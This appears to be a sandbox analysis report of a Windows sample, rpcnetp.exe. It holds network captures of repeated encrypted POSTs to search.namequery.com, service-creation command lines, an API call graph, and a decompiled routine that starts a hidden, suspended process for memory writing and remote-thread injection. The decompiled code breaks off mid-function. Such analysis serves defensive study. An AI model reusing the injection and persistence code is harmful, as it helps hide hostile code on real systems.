Data Raw: 7e a5 4c 82 47 77 7d 5e d8 65 89 ad 6e bc 64 7e 0d 0a
Data Ascii: ~LGw}^end~
Oct 7, 2021 21:25:50.813941956 CEST2686OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 73
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 eb c4 fd 73 91 d5 a3 2c 36 00 1a 9c aa 55 ec c2 1d c7 e5 29 4e 30 77 2a 94 8f f2 a3 09 c7 f8 98 e7 9f 05 36 a8 47 0a 70 4a 2b ac ff 5e 73 c2 56 0e 92 5e 4a 18 09 f9 9e 75 aa 3e f5 5a 84 5b 19 6f d8 2e 7e
Data Ascii: ~` s,6U)N0w*6GpJ+^sV^Ju>Z[o.~
Oct 7, 2021 21:25:50.978565931 CEST2686INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 23
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 38 07 f2 64 0e ea 99 ae 90 23 0f 5a a8 9c 5f 66 7f 7a 6b 7e 0d 0a
Data Ascii: ~8d#Z_fzk~
Oct 7, 2021 21:25:50.982218981 CEST2687OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 40 fc cc 0f eb c4 fd 73 04 00 2e 16 63 8e 78 96 93 7e
Data Ascii: ~` @s.cx~
Oct 7, 2021 21:25:51.147799969 CEST2687INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e f6 16 e1 c9 c6 fc a9 e1 3c c1 b7 08 d9 47 7e 0d 0a
Data Ascii: ~<G~
Oct 7, 2021 21:25:51.150238991 CEST2687OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 bb 46 d2 71 40 fc cc 0f 04 00 8c 64 a2 89 09 6f c8 7e
Data Ascii: ~` Fq@do~
Oct 7, 2021 21:25:51.314759016 CEST2688INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 1b 69 da a4 bf 72 69 c0 97 a5 19 1c a6 7e 0d 0a
Data Ascii: ~iri~
Oct 7, 2021 21:25:51.317600965 CEST2688OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 aa 66 c1 35 bb 46 d2 71 04 00 ac a6 8a ab 1a 1b 8b 7e
Data Ascii: ~` f5Fq~
Oct 7, 2021 21:25:51.482516050 CEST2688INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 17
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 93 78 7b 43 dd e7 4f 4c b0 6d 2a 1b e1 7e 0d 0a
Data Ascii: ~x{COLm*~
Oct 7, 2021 21:25:51.486161947 CEST2688OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 f1 49 9c 97 aa 66 c1 35 04 00 65 fe 34 e4 2b fe ed 7e
Data Ascii: ~` If5e4+~
Oct 7, 2021 21:25:51.651395082 CEST2689INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 30
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 7d 31 af 1f cb 41 bd b0 6d 8f 4e ee c3 e1 8c 0f c3 ef 7b f9 d6 3f fc 3b be 31 7e 0d 0a
Data Ascii: ~}1AmN{?;1~
Oct 7, 2021 21:25:51.654524088 CEST2689OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 a1 ab 57 42 f1 49 9c 97 04 00 2b 9a 89 dc 3c 08 e1 7e
Data Ascii: ~` WBI+<~
Oct 7, 2021 21:25:51.820671082 CEST2689INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 29
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 8c eb 5b 1a f3 ba f2 61 9d 63 cf 99 0f 0e e4 e8 fa e6 34 bf e7 30 4c 5e 58 7e 0d 0a
Data Ascii: ~[ac40L^X~
Oct 7, 2021 21:25:51.827167988 CEST2690OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 23
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 ac 14 1a 98 a1 ab 57 42 04 00 78 e0 64 ea 4d c9 67 7e
Data Ascii: ~` WBxdMg~
Oct 7, 2021 21:25:51.991864920 CEST2690INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 18
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e d7 73 8b 5f 7d 31 29 f4 49 94 fe 5d b0 3a 7e 0d 0a
Data Ascii: ~s_}1)I]:~
Oct 7, 2021 21:25:51.995599031 CEST2690OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 283
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 fe 6b d1 e4 ac 14 1a 98 04 01 57 ae 27 37 ec 7b 2e c1 a6 ab 21 bc 35 e3 5f 14 b6 ef 36 59 67 02 8c 45 ed 3f 85 89 40 53 89 cb 87 87 6e 7a a6 7a 46 e8 05 c9 7d 31 e9 89 1a 5c 37 75 cc 1c 6e e5 be 86 9b 4f d4 a8 77 bf ac 97 2d 31 56 82 ac 0e bd c9 80 d5 8f ab dc 7d 33 db d7 01 71 19 c2 d8 a0 b2 9a 9e bd 94 74 33 26 9e e1 02 4f 87 6e ef 7d 5e 22 9e 80 7b 39 ba 76 2a 2b 71 2e e1 eb 6b 2c e1 d1 8d ff 03 43 ab ee b4 12 17 4b b0 5b c6 b4 a6 47 ab f9 be de 7c f0 c1 fb 6a e0 6d 58 b3 c7 58 93 95 c0 f5 32 85 fd df 1b 94 c1 6e 5b d1 f3 56 91 c8 e4 31 07 e0 f1 de 62 63 fe 69 54 71 66 33 00 1d 0f 5b 86 18 75 6c b0 4b e2 92 e8 32 76 f8 25 68 c2 79 7c 9c 55 1d 4a 3d e1 94 da b2 5f 1e 0b 77 f8 4d 58 df b7 10 64 b2 18 a8 08 f5 d5 ae 4d 5d 91 f4 98 9d 87 59 7a 17 93 71 f9 17 f3 cb 3c 6e a0 4b 3f 07 30 c6 7d 5d d0 a9 5a fb cb 47 5e 25 1a 7e
Data Ascii: ~` kW'7{.!5_6YgE?@SnzzF}1\7unOw-1V}3qt3&On}^"{9v*+q.k,CK[G|jmXX2n[V1bciTqf3[ulK2v%hy|UJ=_wMXdM]Yzq<nK?0}]ZG^%~
Oct 7, 2021 21:25:52.162159920 CEST2691INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 63
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e 54 27 5b ef 0c eb a2 19 4e 8c 82 04 81 37 a5 97 dc 59 08 ae b5 e7 25 1d 8a 89 f9 49 ab 7d 31 42 21 e2 70 53 7d 5e c3 7a 30 5d b7 6c 86 80 77 47 61 38 2b a2 3a 42 69 22 6e 94 27 7e 0d 0a
Data Ascii: ~T'[N7Y%I}1B!pS}^z0]lwGa8+:Bi"n'~
Oct 7, 2021 21:25:52.169229031 CEST2691OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 24
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 51 7d 31 1d bd fe 6b d1 e4 04 00 97 9a fb 2b 6f b4 af 7e
Data Ascii: ~` Q}1k+o~
Oct 7, 2021 21:25:52.333781004 CEST2691INHTTP/1.1 200 OK
Server: 3.288.2.1
Content-Type: image/jpeg
Content-Length: 29
Connection: Keep-Alive
TagId: -2145705888
Data Raw: 7e aa 56 e7 fd d2 6a d7 d3 1a 20 ab 07 d7 90 e4 e6 bf 78 c7 33 1d cf 7f 1f df 7e 0d 0a
Data Ascii: ~Vj x3~
Oct 7, 2021 21:25:52.339021921 CEST2692OUTPOST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: search.namequery.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 24
TagId: -2145705888
Data Raw: 7e 60 20 1b 80 97 79 e1 0d 51 7d 31 1d bd 04 00 1f 3b 44 c0 78 8c 14 7e
Data Ascii: ~` yQ}1;Dx~


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

  • File
  • Registry

Behavior

System Behavior

Start time: 21:23:35
Start date: 07/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 21:23:37
Start date: 07/10/2021
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Imagebase: 0x10e0000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 21:23:38
Start date: 07/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c sc start EcVoz >> C:\servicestart.log 2>&1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 21:23:39
Start date: 07/10/2021
Path: C:\Users\user\Desktop\rpcnetp.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\rpcnetp.exe
Imagebase: 0xa10000
File size: 22932 bytes
MD5 hash: 57BD3200910A8D2C85B1927B27123A6B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Start time: 21:23:41
Start date: 07/10/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Imagebase: 0xfa0000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis

Execution Graph

Execution Coverage: 5.6%
Dynamic/Decrypted Code Coverage: 97.5%
Signature Coverage: 11.8%
Total number of Nodes: 813
Total number of Limit Nodes: 14

Graph

[Execution graph: interactive node/edge rendering of the sample's API call graph, not reproduced as text]
3270 a1357f 3270->3259 3271 a1358d SetTimer 3270->3271 3271->3259 3273 a1328a 3272->3273 3274 a132af 3272->3274 3275 a132a3 3273->3275 3287 a12adb 3273->3287 3276 a12ea1 33 API calls 3274->3276 3275->3270 3276->3275 3279 a12eb0 PostThreadMessageA WaitForSingleObject CloseHandle 3278->3279 3280 a12eef 3278->3280 3279->3280 3281 a12f05 3280->3281 3366 a137be 3280->3366 3281->3261 3281->3266 3281->3267 3283 a12f71 CreateThread 3283->3281 3371 a13132 3283->3371 3285 a137be 2 API calls 3286 a12f63 3285->3286 3286->3283 3323 a14a94 3287->3323 3289 a12aea GetCurrentProcessId OpenProcess 3290 a12b24 3289->3290 3322 a12cf2 3289->3322 3293 a12b53 3290->3293 3294 a12b68 3290->3294 3292 a12cfe 3292->3275 3348 a12598 3293->3348 3296 a12842 10 API calls 3294->3296 3298 a12b75 3296->3298 3299 a12bf6 CreateProcessA 3298->3299 3300 a12b7a DuplicateTokenEx 3298->3300 3303 a12c19 3299->3303 3301 a12bb0 CreateEnvironmentBlock CreateProcessAsUserA 3300->3301 3302 a12b9c SetTokenInformation 3300->3302 3301->3303 3304 a12beb CloseHandle 3301->3304 3302->3301 3305 a12c40 3303->3305 3306 a12c97 3303->3306 3324 a12842 GetModuleFileNameA 3303->3324 3304->3303 3310 a12c58 WriteProcessMemory 3305->3310 3305->3322 3307 a12c9c TerminateProcess CloseHandle 3306->3307 3308 a12caf 3306->3308 3307->3308 3313 a12cb4 CloseHandle 3308->3313 3308->3322 3311 a12c7b 3310->3311 3312 a12cbf ResumeThread 3310->3312 3338 a124bc CreateRemoteThread 3311->3338 3316 a12cc8 3312->3316 3313->3322 3319 a12cd0 CreateThread 3316->3319 3320 a12cea 3316->3320 3319->3322 3365 a12758 3 API calls 3319->3365 3346 a12758 SetStdHandle WaitForSingleObject CloseHandle 3320->3346 3357 a12d0b 3322->3357 3323->3289 3325 a1293e 3324->3325 3326 a1286b lstrcpyA lstrlenA lstrcmpiA 3324->3326 3332 a127d2 VirtualAllocEx 3325->3332 3326->3325 3328 a128b2 lstrcpyA CopyFileA 3326->3328 3328->3325 3329 a128cd CreateFileA 3328->3329 3329->3325 3330 a128e7 SetFilePointer WriteFile CloseHandle 3329->3330 3330->3325 3333 a12838 3332->3333 3334 
a127f8 lstrlenA WriteProcessMemory 3332->3334 3333->3305 3335 a12814 3334->3335 3336 a1282a VirtualFreeEx 3334->3336 3337 a124bc 5 API calls 3335->3337 3336->3333 3337->3336 3339 a1252b TerminateProcess 3338->3339 3343 a124ee 3338->3343 3340 a12535 3339->3340 3340->3306 3340->3316 3341 a124f3 3342 a12520 CloseHandle 3341->3342 3342->3340 3343->3341 3344 a1250c WaitForMultipleObjects 3343->3344 3344->3342 3345 a12516 GetExitCodeThread 3344->3345 3345->3342 3347 a12783 3346->3347 3347->3322 3349 a125a9 GetSystemDirectoryA lstrcatA 3348->3349 3356 a125cb 3348->3356 3355 a1264b 3349->3355 3350 a125cf lstrcpyA 3351 a125e3 RegOpenKeyA 3350->3351 3350->3356 3352 a125f7 RegQueryValueExA RegCloseKey 3351->3352 3351->3356 3353 a1262b GetBinaryTypeA 3352->3353 3354 a1261f lstrcatA 3352->3354 3353->3356 3354->3353 3355->3294 3355->3298 3356->3350 3356->3351 3356->3355 3358 a12d10 3357->3358 3359 a12d23 3358->3359 3360 a12d1d CloseHandle 3358->3360 3361 a12d31 3359->3361 3362 a12d28 CloseHandle 3359->3362 3360->3359 3363 a12d36 CloseHandle 3361->3363 3364 a12d3f 3361->3364 3362->3361 3363->3364 3364->3292 3367 a137d4 3366->3367 3368 a12f26 3367->3368 3369 a137e5 inet_addr 3367->3369 3370 a137eb inet_ntoa 3367->3370 3368->3281 3368->3283 3368->3285 3369->3370 3370->3368 3372 a1313e 3371->3372 3375 a12ff9 3372->3375 3374 a1314c 3379 a1301a 3375->3379 3376 a13081 LocalAlloc 3378 a13094 GetCurrentThreadId 3376->3378 3376->3379 3377 a1307c 3407 a12d40 3377->3407 3378->3379 3379->3376 3379->3377 3384 a130bc CreateThread 3379->3384 3386 a13065 PeekMessageA 3379->3386 3387 a12d7f LoadLibraryA 3379->3387 3396 a11f30 3379->3396 3384->3379 3385 a130e0 SetThreadPriority 3384->3385 3385->3379 3386->3377 3386->3379 3388 a12db4 3387->3388 3389 a12dac 3387->3389 3390 a12dbd GetProcAddress 3388->3390 3392 a12de1 3388->3392 3389->3379 3390->3388 3391 a12dfd FreeLibrary 3390->3391 3391->3389 3392->3389 3393 a12e10 inet_ntoa 3392->3393 3394 a12df8 3392->3394 3393->3394 3394->3389 3395 a12e6d 
wsprintfA 3394->3395 3395->3389 3397 a11f90 3396->3397 3398 a11f3b 3396->3398 3397->3379 3399 a11f4c 3398->3399 3411 a11de6 3398->3411 3416 a11e58 3399->3416 3403 a11f89 LocalFree 3403->3397 3404 a11f5c WaitForSingleObject 3405 a11f7d CloseHandle 3404->3405 3406 a11f6f TerminateThread 3404->3406 3405->3403 3406->3405 3408 a12d7a PostMessageA 3407->3408 3409 a12d4d FreeLibrary 3407->3409 3408->3374 3409->3408 3413 a11dfb 3411->3413 3414 a11e4b 3411->3414 3412 a11e05 GetMessageA 3412->3413 3413->3412 3413->3414 3415 a11e2f TranslateMessage DispatchMessageA 3413->3415 3414->3399 3415->3412 3415->3414 3417 a12d40 FreeLibrary 3416->3417 3418 a11e72 3417->3418 3423 a116ba 3418->3423 3421 a116ba 8 API calls 3422 a11e87 3421->3422 3422->3403 3422->3404 3424 a11759 3423->3424 3425 a116cf EnterCriticalSection 3423->3425 3424->3421 3426 a116f9 SetEvent 3425->3426 3427 a116fc 3425->3427 3426->3427 3428 a11706 SetEvent 3427->3428 3429 a11709 3427->3429 3428->3429 3430 a11734 3429->3430 3431 a11719 WaitForSingleObject CloseHandle 3429->3431 3432 a11741 3430->3432 3433 a1173e CloseHandle 3430->3433 3431->3430 3434 a1174b CloseHandle 3432->3434 3435 a1174e DeleteCriticalSection 3432->3435 3433->3432 3434->3435 3435->3424 4164 a1221c 4165 a1221f 4164->4165 4166 a12232 4165->4166 4167 a12229 FreeLibrary 4165->4167 4168 a12241 4166->4168 4169 a12238 LocalFree 4166->4169 4167->4166 4169->4168 4170 a1471c 4173 a1472b 4170->4173 4172 a148c6 4174 a14f50 4173->4174 4175 a14f61 4174->4175 4176 a14f76 4174->4176 4177 a14dc6 3 API calls 4175->4177 4179 a14f6f 4175->4179 4176->4179 4180 a14d83 4176->4180 4177->4179 4179->4172 4181 a14da6 4180->4181 4182 a14d8f 4180->4182 4184 a134a6 2 API calls 4181->4184 4183 a14d44 GetVersion 4182->4183 4185 a14d9b 4183->4185 4186 a14db2 4184->4186 4187 a11b20 LocalAlloc 4185->4187 4186->4179 4187->4181 4226 a11eeb 4227 a11f12 4226->4227 4228 a11ef4 4226->4228 4235 a12266 SetServiceStatus 4227->4235 4228->4227 4229 a11ef9 4228->4229 4234 a12266 
SetServiceStatus 4229->4234 4232 a11f20 SetEvent 4233 a11f10 4232->4233 4234->4233 4235->4232 4236 a13675 4237 a13684 GetModuleHandleA 4236->4237 4238 a136ac 4236->4238 4237->4238 4239 a13690 4237->4239 4239->4238 4240 a13694 GetProcAddress 4239->4240 4240->4238 4241 a120f4 4242 a120f7 4241->4242 4243 a14dc6 3 API calls 4242->4243 4244 a12104 4243->4244 4245 a14474 4246 a14483 4245->4246 4247 a1449c 4246->4247 4249 a1493c 4246->4249 4250 a1494c 4249->4250 4250->4250 4251 a14955 LoadLibraryA 4250->4251 4252 a149de 4251->4252 4253 a1496e GetProcAddress GetProcAddress GetProcAddress 4251->4253 4252->4247 4255 a149a4 FreeLibrary 4253->4255 4255->4252 4256 a15277 4259 a15288 4256->4259 4257 a15303 4258 a1501f 11 API calls 4258->4259 4259->4257 4259->4258 4260 a15126 14 API calls 4259->4260 4260->4259 4261 72b21eeb 4262 72b21f12 4261->4262 4263 72b21ef4 4261->4263 4270 72b22266 SetServiceStatus 4262->4270 4263->4262 4264 72b21ef9 4263->4264 4269 72b22266 SetServiceStatus 4264->4269 4267 72b21f20 SetEvent 4268 72b21f10 4267->4268 4269->4268 4270->4267 4271 a11c7b 4280 a14a94 4271->4280 4273 a11c87 LocalAlloc GetStdHandle 4274 a11cab WriteProcessMemory 4273->4274 4275 a11d1a ExitThread 4273->4275 4276 a11d08 LocalFree 4274->4276 4277 a11ccc ReadProcessMemory 4274->4277 4276->4275 4277->4276 4278 a11ce1 4277->4278 4279 a11f95 34 API calls 4278->4279 4279->4276 4280->4273 4284 72b22658 CreateEventA RegisterServiceCtrlHandlerA 4285 72b226aa 4284->4285 4298 72b22751 4284->4298 4299 72b22266 SetServiceStatus 4285->4299 4287 72b226c0 4300 72b22266 SetServiceStatus 4287->4300 4289 72b226d3 4301 72b22296 RegOpenKeyA 4289->4301 4292 72b22706 WaitForSingleObject 4295 72b2272a WaitForSingleObject CloseHandle 4292->4295 4296 72b2271f PostMessageA 4292->4296 4293 72b226fe 4294 72b2273d CloseHandle 4293->4294 4307 72b22266 SetServiceStatus 4294->4307 4295->4294 4296->4295 4299->4287 4300->4289 4302 72b22312 CreateThread 4301->4302 4303 72b222bb RegQueryValueExA 4301->4303 4302->4292 
4302->4293 4308 72b23161 4302->4308 4304 72b222ed RegEnumValueA 4303->4304 4305 72b222e0 RegDeleteValueA 4304->4305 4306 72b22306 RegCloseKey 4304->4306 4305->4304 4306->4302 4307->4298 4314 72b24a94 4308->4314 4310 72b23170 GetModuleFileNameA RegisterClassA CreateWindowExA SetTimer 4311 72b231df GetMessageA 4310->4311 4312 72b231f0 TranslateMessage DispatchMessageA 4311->4312 4313 72b23206 4311->4313 4312->4311 4314->4310 4315 a1224a PostThreadMessageA 4316 72b232de GetVersion 4317 72b23307 GetStdHandle 4316->4317 4318 72b232fc 4316->4318 4340 72b23420 4317->4340 4318->4317 4321 72b233a3 4324 72b233b1 CreateEventA 4321->4324 4331 72b233c0 CreateThread 4321->4331 4334 72b23369 4321->4334 4322 72b23376 SetStdHandle 4339 72b23365 4322->4339 4323 72b23334 4347 72b22123 4323->4347 4324->4331 4325 72b2339c 4363 72b21eda StartServiceCtrlDispatcherA 4325->4363 4327 72b23413 CloseHandle 4328 72b23418 ExitProcess 4327->4328 4330 72b23343 4332 72b22adb 47 API calls 4330->4332 4333 72b233da 4331->4333 4331->4334 4365 72b23161 7 API calls 4331->4365 4335 72b23357 4332->4335 4336 72b233e9 WaitForSingleObject CloseHandle 4333->4336 4337 72b233fc WaitForSingleObject CloseHandle 4333->4337 4334->4327 4334->4328 4338 72b23362 CloseHandle 4335->4338 4335->4339 4336->4337 4337->4334 4338->4339 4339->4321 4339->4324 4339->4325 4339->4334 4341 72b2343a 4340->4341 4342 72b23459 4340->4342 4345 72b22842 10 API calls 4341->4345 4343 72b23480 GetCurrentProcessId 4342->4343 4344 72b23318 4342->4344 4343->4344 4344->4322 4344->4323 4344->4339 4346 72b23448 LoadLibraryA 4345->4346 4346->4342 4364 72b24a94 4347->4364 4349 72b2212f LoadLibraryA 4350 72b22154 GetProcAddress 4349->4350 4359 72b2221f 4349->4359 4351 72b2216d GetProcAddress 4350->4351 4350->4359 4357 72b22180 4351->4357 4351->4359 4352 72b22232 4354 72b22241 4352->4354 4355 72b22238 LocalFree 4352->4355 4353 72b22229 FreeLibrary 4353->4352 4354->4330 4355->4354 4356 72b22185 LocalAlloc 4356->4357 4356->4359 4357->4356 4358 72b221a8 
LocalFree 4357->4358 4357->4359 4360 72b221c1 4357->4360 4358->4357 4359->4352 4359->4353 4360->4359 4361 72b221df OpenProcess 4360->4361 4361->4359 4362 72b221f4 OpenProcessToken CloseHandle 4361->4362 4362->4359 4363->4334 4364->4349 4369 a14acf 4371 a14b0d 4369->4371 4370 a14bcc 4371->4370 4372 a14b9c RtlUnwind 4371->4372 4372->4371 3218 a12658 CreateEventA RegisterServiceCtrlHandlerA 3219 a12752 3218->3219 3220 a126aa 3218->3220 3234 a12266 SetServiceStatus 3220->3234 3222 a126c0 3235 a12266 SetServiceStatus 3222->3235 3224 a126d3 3236 a12296 RegOpenKeyA 3224->3236 3227 a12706 WaitForSingleObject 3230 a1272a WaitForSingleObject CloseHandle 3227->3230 3231 a1271f PostMessageA 3227->3231 3228 a126fe 3229 a1273d CloseHandle 3228->3229 3242 a12266 SetServiceStatus 3229->3242 3230->3229 3231->3230 3233 a12751 3233->3219 3234->3222 3235->3224 3237 a12312 CreateThread 3236->3237 3238 a122bb RegQueryValueExA 3236->3238 3237->3227 3237->3228 3243 a13161 3237->3243 3239 a122ed RegEnumValueA 3238->3239 3240 a122e0 RegDeleteValueA 3239->3240 3241 a12306 RegCloseKey 3239->3241 3240->3239 3241->3237 3242->3233 3249 a14a94 3243->3249 3245 a13170 GetModuleFileNameA RegisterClassA CreateWindowExA SetTimer 3246 a131df GetMessageA 3245->3246 3247 a131f0 TranslateMessage DispatchMessageA 3246->3247 3248 a13206 3246->3248 3247->3246 3249->3245 3436 a132de GetVersion 3437 a13307 GetStdHandle 3436->3437 3438 a132fc 3436->3438 3462 a13420 3437->3462 3438->3437 3441 a1338f 3442 a133a3 3441->3442 3445 a133b1 CreateEventA 3441->3445 3446 a1339c 3441->3446 3442->3445 3448 a13369 3442->3448 3449 a133ac 3442->3449 3443 a13334 3470 a12123 3443->3470 3444 a13376 SetStdHandle 3444->3441 3450 a133c0 CreateThread 3445->3450 3469 a11eda StartServiceCtrlDispatcherA 3446->3469 3451 a13413 CloseHandle 3448->3451 3452 a13418 ExitProcess 3448->3452 3449->3445 3449->3450 3450->3448 3456 a133da 3450->3456 3451->3452 3454 a13343 3455 a12adb 47 API calls 3454->3455 3457 a13357 3455->3457 3458 a133e9 
WaitForSingleObject CloseHandle 3456->3458 3459 a133fc WaitForSingleObject CloseHandle 3456->3459 3460 a13362 CloseHandle 3457->3460 3461 a13365 3457->3461 3458->3459 3459->3448 3460->3461 3461->3441 3461->3448 3463 a13459 3462->3463 3464 a1343a 3462->3464 3465 a13480 GetCurrentProcessId 3463->3465 3466 a13318 3463->3466 3467 a12842 10 API calls 3464->3467 3465->3466 3466->3441 3466->3443 3466->3444 3468 a13448 LoadLibraryA 3467->3468 3468->3463 3469->3448 3486 a14a94 3470->3486 3472 a1212f LoadLibraryA 3473 a1221f 3472->3473 3474 a12154 GetProcAddress 3472->3474 3475 a12232 3473->3475 3476 a12229 FreeLibrary 3473->3476 3474->3473 3477 a1216d GetProcAddress 3474->3477 3478 a12241 3475->3478 3479 a12238 LocalFree 3475->3479 3476->3475 3477->3473 3481 a12180 3477->3481 3478->3454 3479->3478 3480 a12185 LocalAlloc 3480->3473 3480->3481 3481->3473 3481->3480 3482 a121a8 LocalFree 3481->3482 3483 a121c1 3481->3483 3482->3481 3483->3473 3484 a121df OpenProcess 3483->3484 3484->3473 3485 a121f4 OpenProcessToken CloseHandle 3484->3485 3485->3473 3486->3472

Executed Functions

Control-flow Graph

C-Code - Quality: 91%
			E00A12ADB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t70;
				int _t83;
				int _t84;
				void* _t91;
				int _t101;
				void* _t117;
				struct _STARTUPINFOA _t120;
				void** _t121;
				void* _t124;

				_t117 = __ecx;
				_push(0x180);
				_push(0xa15410);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t124 - 0x1c) = 0;
				 *(_t124 - 0x3c) = 0;
				 *((intOrPtr*)(_t124 - 0x24)) =  *((intOrPtr*)( *0xa16008 + 0x34));
				 *(_t124 - 0x40) = 0;
				 *(_t124 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId()); // 0x1fffff = PROCESS_ALL_ACCESS; bInheritHandle = TRUE so the child created below can inherit this handle
				 *(_t124 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t124 - 4) =  *(_t124 - 4) | 0xffffffff;
					E00A12D0B(0);
					return E00A1159C( *(_t124 - 0x1c));
				} else {
					_t120 = 0x44;
					E00A14D2D(_t124 - 0x8c, 0, _t120);
					 *(_t124 - 0x8c) = _t120;
				 *((short*)(_t124 - 0x5c)) = 0; // STARTUPINFO.wShowWindow = SW_HIDE
				 *((intOrPtr*)(_t124 - 0x60)) = 0x181; // STARTUPINFO.dwFlags = STARTF_USESHOWWINDOW | STARTF_FORCEOFFFEEDBACK | STARTF_USESTDHANDLES
				 *(_t124 - 0x4c) =  *(_t124 - 0x38); // STARTUPINFO.hStdError = the inheritable handle to this process opened above
					if( *((intOrPtr*)(_t124 - 0x24)) == 0 || E00A12598(_t124 - 0x190, 0x104) == 0) {
						E00A12842(_t124 - 0x190, 1);
					}
					if( *(_t124 + 8) == 0) {
						_t83 = CreateProcessA(0, _t124 - 0x190, 0, 0, 1, 4, 0, 0, _t124 - 0x8c, _t124 - 0x34); // executed; bInheritHandles = TRUE, dwCreationFlags = CREATE_SUSPENDED
						 *(_t124 - 0x1c) = _t83;
					} else {
						_t121 = _t124 + 8;
						 *(_t124 - 0x20) = 0;
						 *(_t124 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t124 + 8), 0x2000000, 0, 0, 1, _t124 - 0x20) != 0) { // MAXIMUM_ALLOWED, TokenPrimary
							SetTokenInformation( *(_t124 - 0x20), 0xc, _t124 - 0x44, 4); // TokenSessionId = 0: bind the duplicated token to session 0
							_t121 = _t124 - 0x20;
						}
						_push(0);
						_push( *_t121);
						_push(_t124 - 0x40);
						L00A1446E(); // CreateEnvironmentBlock(&env, hToken, FALSE) through the import thunk (see APIs below)
						 *(_t124 - 0x1c) = CreateProcessAsUserA( *_t121, 0, _t124 - 0x190, 0, 0, 1, 0x404,  *(_t124 - 0x40), 0, _t124 - 0x8c, _t124 - 0x34); // dwCreationFlags = CREATE_SUSPENDED | CREATE_UNICODE_ENVIRONMENT
